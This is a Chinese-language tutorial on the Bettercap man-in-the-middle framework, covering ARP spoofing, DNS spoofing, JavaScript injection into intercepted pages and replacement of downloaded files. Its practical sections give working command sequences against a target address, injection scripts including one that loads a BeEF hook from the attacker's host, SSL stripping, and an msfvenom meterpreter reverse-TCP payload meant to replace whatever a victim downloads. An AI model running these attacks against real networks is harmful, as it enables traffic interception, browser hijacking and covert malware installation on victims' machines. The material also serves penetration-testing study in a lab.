强大的中间人攻击工具(Bettercap)

目录

  • 前言
  • 安装
  • 常用功能及模块介绍
  • 实战应用
    • ARP欺骗
    • DNS欺骗
    • 注入脚本
    • 替换下载文件

~~~~~~~~         因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                                                 ————玛丽亚·杜埃尼亚斯

前言

提到中间人攻击,最知名的莫过于ettercap,这是kali下一款优秀的ARP欺骗工具,但是它自从2015年开始就没有更新了,同时在大型网络环境中ettercap的主机发现以及欺骗功能效果较差,于是就诞生了bettercap。Bettercap是一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试。

安装

在kali命令行下运行

root@kali:~# apt-get install bettercap

在这里插入图片描述
使用如下命令打开bettercap(注意:一般打开就会列出局域网中存活的主机,但是我这儿没有,是因为主机发现模块没有打开,打开就好命令:net.recon on)

root@kali:~# bettercap  #开启bettercap,默认是开启的eth0网卡,如果想开启其他网卡,比如无线网卡wlan0,可以bettercap iface wlan0

在这里插入图片描述
使用net.show可以列出局域网存活的主机
在这里插入图片描述
输入help 可以查看bettercap的用法(绿色表示启用,红色表示未启用) help后面跟模块名可以查看模块的详情。比如:help net.recon
在这里插入图片描述在这里插入图片描述

常用功能及模块介绍

#功能解释
help  模块名称      显示指定模块的帮助
active:            显示当前运行中的模块的信息
quit :             结束会话并退出
sleep 秒数:        休眠指定的秒数(和shell中的sleep一样)
get 变量:          获取变量的值
set 变量值 :       设置变量的值(有些模块有自定义变量,比如可用net.sniff.output变量指定嗅探器的输出的保存路径)
read 变量提示:     显示提示来让用户输入,输入内容会被储存在变量中
clear:             清屏
include CAPLET:    在当前会话读取并运行这个caplet
! 命令 :           运行相应的shell命令并显示输出
alias MAC地址 别名  给MAC地址设置一个别名
# 常用模块
api.rest:         RESTful API模块
net.recon :       主机发现模块,用于发现局域网内存活的主机,默认是开启的
arp.spoof:        arp欺骗模块
ble.recon:        低功耗蓝牙设备发现模块
net.sniff :        网络嗅探模块
dhcp6.spoof:      dhcp6欺骗模块(通过伪造DHCP数据包篡改客户端的DNS服务器,因此需要与dns.spoof一并启用)
dns.spoof:        DNS欺骗模块
events.stream:    串流输出模块(就是不断地在终端界面刷出程序的输出,例如arp截获的信息)
wifi:             wifi模块,有deauth攻击(wifi杀手)和创建软ap的功能

实战应用

ARP欺骗

中间人攻击中最常用的就是ARP欺骗了,接下来我们使用bettercap来进行ARP欺骗,熟悉一下arp.spoof这个模块。
首先输入help arp.spoof 查看下这个模块的帮助信息
在这里插入图片描述
如图所示,英文不好同学的看这里!

# 状态
arp.spoof  on :     开启ARP欺骗
arp.ban  on :      开启ARP欺骗,用ban模式,这就意味着目标将不能上网,也就是断网攻击
arp.spoof off :    停止ARP欺骗 
arp.ban off :       停止ARP欺骗
# 参数
arp.spoof.internal:  如果为true,那么网络中的计算机之间的本地连接将被欺骗,否则只能连接到来自外部网络(默认为false)
arp.spoof.targets:   要欺骗的目标,可以是 ip 、mac 或者 别名 ,也可以支持nmap形式的ip区域
arp.spoof.whitelist: 白名单,就是不欺骗的目标,可以是ip、mac或者别名

对于参数而言,我们可以使用set来设置,使用get来获取

set arp.spoof.targets 172.20.10.13 #设置攻击目标,可以是一个网段如:172.20.10.1-20.多个地址使用逗号隔开
get arp.spoof.targets              #获取arp.spoof.targets的值

在这里插入图片描述
设置好参数后,我们就可以开启ARP欺骗了:arp.spoof on
在这里插入图片描述
通过net.sniff可以嗅探到目标机的浏览数据
在这里插入图片描述
通过wireshark抓包可以发现大量的来自目标机的流量
在这里插入图片描述
查看目标机的arp缓存表,发现网关的mac已经被修改为kali(攻击机的mac)
在这里插入图片描述

DNS欺骗

DNS欺骗有一个前提,就是局域网内的主机的DNS服务器是局域网的网关,才能进行欺骗。如果是公网的DNS就不行了。
DNS欺骗之前我们需要利用ARP欺骗让目标机认为网关就是我们(攻击机),所以主机就会向我们发送DNS请求,这样就可以进行DNS欺骗了。
首先进行ARP欺骗

set arp.spoof.targets 172.20.10.13
arp.spoof on

然后进行DNS欺骗

set dns.spoof.domains www.sina.com #设置要欺骗的域名,多个域名用逗号隔开,如果要欺骗所有域名用通配符“*”
set dns.spoof.address 172.20.10.12 #设置将要欺骗的域名转换成的ip地址(这里可以换成我们自己的服务器,里面写上一个假的网站做些不可描述的东西)
dns.spoof on  #开启DNS欺骗

如图所示,ping www.sina.com时目标机直接向我们发起请求。打新浪首页进入的是我们自己的网站。
在这里插入图片描述
为了避免代码的重复呢,我们还可以打开bettercap的目录创建一个host文件,文件中存放要欺骗的域名和地址,然后在进行DNS欺骗的时候只需要设置arp.spoof.hosts这个参数就行了。
比如我们创建一个host文件如下:
在这里插入图片描述
进行DNS欺骗的时候只需要设置arp.spoof.hosts这个参数就行了

set dns.spoof.hosts /root/host   #设置欺骗的域名和对应ip
dns.spoof on  #开启dns欺骗

在这里插入图片描述
在这里插入图片描述

注入脚本

通过进行ARP欺骗,我们可以拦截到流量,自然就可以对拦截到的流量进行操作,我们可以对http协议的数据包进行代理,然后向里面注入恶意脚本。

set arp.spoof.targets 172.20.10.13    #设置arp欺骗的目标
arp.spoof on                          #开启ARP欺骗
set http.proxy.script /root/1.js      #注入恶意脚本
set https.proxy.script /root/1.js
http.proxy on                         #开启HTTP代理
https.proxy on 

脚本文件1.js如下

function onResponse(req,res){if(res.ContentType.indexOf('text/html')==0){var body=res.ReadBody();if(body.indexOf('</head>')!=-1){res.Body=body.replace('</head>','<script type="text/javascript">alert("your computer has hacked!")</script></head>');}}
}

在这里插入图片描述
当目标机访问一个http或者https协议的站点时,就可以看到脚本已经注入到请求的网站。
在这里插入图片描述
结合beef-xss注入

既然我们可以注入js脚本,那么我们就可以利用beef来对目标浏览器进行控制。

set arp.spoof.targets 172.20.10.13    #设置arp欺骗的目标
set http.proxy.script  /root/test.js        #往http流量中注入脚本/root/test.js
set http.proxy.sslstrip true    #启用SSL剥离http.proxy on   #开启HTTP代理
arp.spoof on   #开启ARP欺骗

test.js内容如下:

function onResponse(req,res){if(res.ContentType.indexOf('text/html')==0){var body=res.ReadBody();if(body.indexOf('</head>')!=-1){res.Body=body.replace('</head>','<script type="text/javascript" src="http://172.20.10.2:3000/hook.js"></script></head>');}}
}

beef不晓得传送门在这里——>kali之beef的使用

替换下载文件

在bettercap中,有一种文件后缀叫.cap我们启动bettercap的时候可以指定该.cap文件,就可以按照这个文件还行命令。
比如我们随便创建一个xss.cap文件,内容如下:
在这里插入图片描述
在命令行中输入以下命令就可以加载并执行xss.cap的命令

root@kali:~# bettercap -caplet xss.cap 

在这里插入图片描述
使用active可以详细的查看框架的变量及开启的模块
在这里插入图片描述
在新的版本中还加入了caplets,使用caplets.update下载更新后会存储由由开发者编写的各种功能的模块脚本。我们可以通过caplets.show来查看有哪些.cap模块。
在这里插入图片描述
http-req-dump模块,这个模块能够欺骗内网流量走本地透明代理并输出内容。
download-autopwn文件可以保存着一些脚本,我们可以生成自己的一个木马后门放进去然后启用这个文件。当被欺骗着下载任意文件时都会被替换成我们的后门。

root@kali:/usr/share/bettercap/caplets/download-autopwn/windows# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.2 lport=8888 -f exe -o payload.exe 
root@kali:~# bettercap -caplet download-autopwn/download-autopwn

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/31818.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ChatGPT可能助长攻击者能力,引起IT专家警惕

近期火热的ChatGPT引发各行业的关注&#xff0c;据国外机构黑莓&#xff08;BlackBerry&#xff09;一项针对北美、英国和澳大利亚1500名IT决策者的调查显示&#xff0c;51%的IT专业人士预测&#xff0c;距离ChatGPT成功实现网络攻击只有不到一年的时间&#xff0c;71%的人认为…

【花雕学AI】微软 Bing 图像魔法师:让你的描述变成图像,让你的图像变成现实

你有没有想过&#xff0c;如果你能够用语言来创造图像&#xff0c;那该有多么神奇和有趣&#xff1f;你有没有想过&#xff0c;如果你能够看到你想象中的图像&#xff0c;那该有多么震撼和美妙&#xff1f;现在&#xff0c;这一切都可以实现了&#xff0c;因为微软 Bing 图像魔…

看了几集狂飙,大佬说我变了!今天就来说下我这段时间的感受

大家好&#xff0c;我是晓衡。 前天&#xff0c;晓衡有幸被麒麟子大佬给点名了&#xff01;更确切点&#xff0c;应该是我的一些行为&#xff0c;把麒麟子给惊讶到了。 什么原因呢&#xff1f; 因为这几天&#xff0c;麒麟子正对 Cocos 赛博朋克项目兴奋、着迷&#xff0c;奋笔…

ChatGPT一路狂飙,NVMe SSD能否应对性能挑战?

近日&#xff0c;ChatGPT持续火爆&#xff0c;用户在短短两个月内迅速破亿&#xff0c;大量用户涌入导致ChatGPT访问和数据规模指数级增加。与数月前发布的版本相比&#xff0c;新的ChatGPT“智能”了许多&#xff0c;不仅可以像人类一样聊天交流&#xff0c;甚至能够完成一定程…

Python读写xml(xml,lxml)Edge 浏览器插件 WebTab - 免费ChatGPT

Python读写xml&#xff08;xml&#xff0c;lxml&#xff09;Edge 浏览器插件 WebTab - 免费ChatGPT XML一、xml文件创建方法一&#xff1a;使用xml.dom.minidom1、文件、标签的创建 方法二&#xff1a;使用ElementTree 二、xml文件修改1、修改标签内容&#xff0c;属性2、增加子…

4090显卡上部署 Baichuan-13B-Chat

4090显卡上部署 Baichuan-13B-Chat 0. 背景1. huggingface 地址2. 量化部署使用 Baichuan-13B-Chat3. FastChat 部署使用 Baichuan-13B-Chat3-1. 创建虚拟环境3-2. 克隆代码3-3. 安装依赖库3-4. 使用命令行进行推理3-5. 使用 UI 进行推理3-6. 使用 OpenAI API 方式进行推理3-7.…

清华ChatGLM2-6B开源!第二代性能大幅提升,推理提速42%,最高支持32K上下文

清华ChatGLM2-6B开源&#xff01;第二代性能大幅提升&#xff0c;推理提速42%&#xff0c;最高支持32K上下文 3月份&#xff0c;清华系大模型 ChatGLM-6B 惊喜亮相。 ChatGLM-6B 是一个开源的、支持中英双语的对话语言模型&#xff0c;基于 General Language Model (GLM) 架构…

Baichuan-13B 介绍及微调

文章目录 Baichuan-13B介绍Baichuan-13B特点Baichuan-13B效果Baichuan-13B模型参数 推理和部署模型下载模型推理 微调和部署下载仓库配置环境微调数据微调过程 Baichuan-13B介绍 2023年7月11日&#xff0c;百川智能发布Baichuan-13B&#xff01; github地址&#xff1a;https:…

【大模型】更强的 LLaMA2 来了,开源可商用、与 ChatGPT 齐平

【大模型】可商用且更强的 LLaMA2 来了 LLaMA2 简介论文GitHubhuggingface模型列表训练数据训练信息模型信息 许可证参考 LLaMA2 简介 2023年7月19日&#xff1a;Meta 发布开源可商用模型 Llama 2。 Llama 2是一个预训练和微调的生成文本模型的集合&#xff0c;其规模从70亿到…

[Unity3D] 协程

目录 前言 学习来源&#xff1a; 一、什么是协程 二、协程的应用举例 三、协程的使用方式 3.1 启动 3.2 结束 3.3 嵌套 3.4 注意 四、Unity脚本的生命周期 五、yield速查表 前言 学习笔记&#xff0c;仅供学习&#xff0c;不做商用&#xff0c;如有侵权&#…

“AIGC早报”已内测2个月了,来看看她长什么样子

今天&#xff0c;是咱们社群“AI产品经理大本营”六周年活动的第二天&#xff0c;正式给大家介绍下&#xff0c;已内测2个月的重要会员权益——AIGC日报。 会分三个部分&#xff1a;效果口碑、我们如何做到的、今日的AIGC早报展示‍‍‍‍‍‍‍‍ ps&#xff0c;文末会发福利星…

何以驾驭AIGC领域的关键进程?得深邃技术得天下

“大海和火车成为那个世纪新兴经济的象征&#xff1a;强大、危险、难以驾驭和预测&#xff0c;但令人着迷和兴奋。” 这是诺贝尔经济学奖得主埃德蒙•费尔普斯曾在《大繁荣》一书中对19世纪有过这样的描述。 穿越回当下的21世纪&#xff0c;又有哪项发明具备这些特质&#xff…

【腾讯云 Cloud Studio 实战训练营】Cloud Studio实现健康上报小程序(代码开源)

目录 &#x1f373;前言&#x1f373;实验介绍&#x1f373;产品介绍&#x1f373;注册Cloud Stdio&#x1f373;后端Spring服务&#x1f373;创建项目上传项目数据库连接与导入 &#x1f373;Vue后台管理创建项目编辑模板信息选择环境镜像上传资源文件 &#x1f373;小程序⭐总…

【OpenMMLab AI实战营二期笔记】第七天 MMDetection代码课

0. 环境检测和安装 # 安装 mmengine 和 mmcv 依赖 # 为了防止后续版本变更导致的代码无法运行&#xff0c;暂时锁死版本 pip install -U "openmim0.3.7" mim install "mmengine0.7.1" mim install "mmcv2.0.0"# Install mmdetection rm -rf mmd…

AI实战营第二期 第六节 《MMDetection代码课》——笔记7

文章目录 什么是MMDetection&#xff1f;环境检测和安装1 数据集准备和可视化2 自定义配置文件3 训练前可视化验证4 模型训练5 模型测试和推理6 可视化分析MMYOLO 环境和依赖安装特征图可视化1. 可视化 backbone 输出的 3 个通道2. 可视化 neck 输出的 3 个通道 Grad-Based CAM…

最新!2023软科中国大学排名发布!

Datawhale高校 方向&#xff1a;软科中国大学排名&#xff0c;来源&#xff1a;软科 2023年3月30日&#xff0c;高等教育专业评价机构软科今日正式发布2023“软科中国大学专业排名”。 上榜高校共有590所&#xff0c;清华大学、北京大学、浙江大学连续9年蝉联全国三甲&#xf…

ChatGPT 和对话式 AI 的未来:2023 年的进展和应用

人工智能(Artificial Intelligence)在过去一段时间以来以前所未有的速度快速发展。从自动化日常任务到重要提醒的设定,AI以各种方式渗透到我们的生活中。然而,在这个领域中迈出的最重要一步是ChatGPT。 ChatGPT被瑞银(UBS)评为“有史以来增长最快的消费者应用程序”,于…

月薪13K!从零开始,小白转行程序员,三个月实现人生逆转~

思绪运转之间&#xff0c;上班也已经有一周了&#xff0c;我有想过给的所有老师都写一封感谢信的&#xff0c;但发现工作量太大了&#xff0c;只能用这一封信来表达对所有老师们的感谢。 软件测试&#xff0c;一个陌生的领域&#xff0c;对于一个毫无经验的小白来说&#xff0…

ChatGPT生成一篇文章:关于Docker

如今AI智能如火如荼&#xff0c;如果不会点ChatGPT总感觉有点落后了。最近刚好重新复习了一遍Docker&#xff0c;这里尝试通过ChatGPT来生成一篇关于Docker文章。来看效果。 1、什么是Docker Docker是一种容器化技术&#xff0c;可以将应用程序和它们的依赖项封装在一个虚拟的…

自主安装IPA文件到iPhone上

1.电脑下载iTunes&#xff0c;手机使用数据线连接在电脑上&#xff0c;一定要选择信任电脑 2.打开iTunes&#xff0c;点击手机图标 3.拖拽已下载的IPA文件到我的设备&#xff0c;蓝色高亮处&#xff0c;可以看到顶部的进度条&#xff0c;进度条完了可以查看手机&#xff0c;已…